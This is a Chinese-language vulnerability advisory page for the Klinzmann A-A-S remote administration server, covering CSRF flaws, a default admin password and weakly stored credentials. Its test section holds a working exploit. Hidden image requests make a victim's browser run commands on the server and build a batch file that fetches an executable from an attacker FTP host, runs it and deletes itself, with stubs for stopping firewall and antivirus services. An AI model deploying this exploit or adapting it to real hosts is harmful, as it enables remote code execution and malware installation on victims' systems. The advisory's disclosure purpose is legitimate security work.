A-A-S服务器跨站脚本和默认口令漏洞

发表评论 (0) 查看评论

受影响系统:

Klinzmann A-A-S 2.0.48

描述:

BUGTRAQ  ID: 34911
CVE(CAN) ID: CVE-2009-1464,CVE-2009-1465,CVE-2009-1466

A-A-S(Application Access Server)是一个免费的远程管理工具,允许使用基于WEB的客户端通过Internet启动或停止应用或服务。

A-A-S的index.aas页面存在多个跨站请求伪造漏洞,如果用户查看了恶意网页的话,远程攻击者就可以通过HTTP请求执行任意程序或终止服务或请求。

A-A-S默认安装了一个管理帐号,该账号使用了默认的wildbat口令且启用了所有的安全权限;此外A-A-S未经加密便将口令和端口口令以base64字符串的形式储存在了安装目录的aas.ini文件中。

<*来源:Felipe Aragon (felipe@syhunt.com
  
  链接:http://secunia.com/advisories/35034/
        http://marc.info/?l=bugtraq&m=124213796127278&w=2
*>

测试方法:

<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=command&action=[command]">
<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=setservice&action=stop&select=[servicename]">
<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=killprocess&select=[exename]">

<html>
<body>

<script>
// Javascript is used to force the browser to sequentially load
// the images that will trigger the server commands.

var dd=1000; // default delay time (ms)
var aas_url=’http://[host]:6262′; // target AAS host
var ftp_host=’x.x.x.x’; // attacker ftp host
var ftp_user=’anonymous’;
var ftp_pass=’123456′;
var ftp_commands_file=’aashack.ftp’;
var batch_file=’aashack.bat’;
var attacker_file=’file.exe’; // file to upload

function delay(ms) {
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < ms);
}

function writeimg(job,action,select) {
var act = escape(action);
var sel = escape(select);
document.write(‘<img src="’+aas_url+’/index.aas?job=’+job+’&action=’+act+’&select=’+sel+’" style="visibility:hidden;">’);
}

// Main Functions
function Run(action,dms) { writeimg(‘command’,action,”); delay(dms); }
function Console(cmdline,dms) { Run(‘cmd /C ‘+cmdline,dms); }
function AddFTPCmd(cmdline) { Console(‘echo ‘+cmdline+’>>’+ftp_commands_file,dd); }
function AddBatchLine(line) { Console(‘echo ‘+line+’>>’+batch_file,dd); }
//function Kill(exename) { Run(‘taskkill /f /im ‘+exename,dd); } // alternative way to kill a process
function StopSvc(servicename) { writeimg(‘setservice’,’stop’,servicename); delay(dd); }
function KillProcess(exename) { writeimg(‘killprocess’,”,exename); delay(dd); }

function StopUndesiredServices() {
//StopSvc("somefirewall");
//StopSvc("someantivirus");
//StopSvc("wuauserv"); // Automatic Updates
}

function KillUndesiredProcesses() {
//KillProcess(‘firewall.exe’);
}

AddFTPCmd(ftp_user);
AddFTPCmd(ftp_pass);
AddFTPCmd(‘binary’);
AddFTPCmd(‘get ‘+attacker_file);
AddFTPCmd(‘close’);
AddFTPCmd(‘bye’);
AddBatchLine(‘@echo off’);
AddBatchLine(‘ftp -is:’+ftp_commands_file+’ ‘+ftp_host);
AddBatchLine(‘start ‘+attacker_file);
AddBatchLine(‘del ‘+ftp_commands_file);
AddBatchLine(‘del %0’); // self-destruct
StopUndesiredServices();
KillUndesiredProcesses();
Run(batch_file,dd);
</script>

</body>
</html>

建议:

 

厂商补丁:

Klinzmann
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.klinzmann.name/a-a-s/index_en.html

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

发表评论?

0 条评论。

发表评论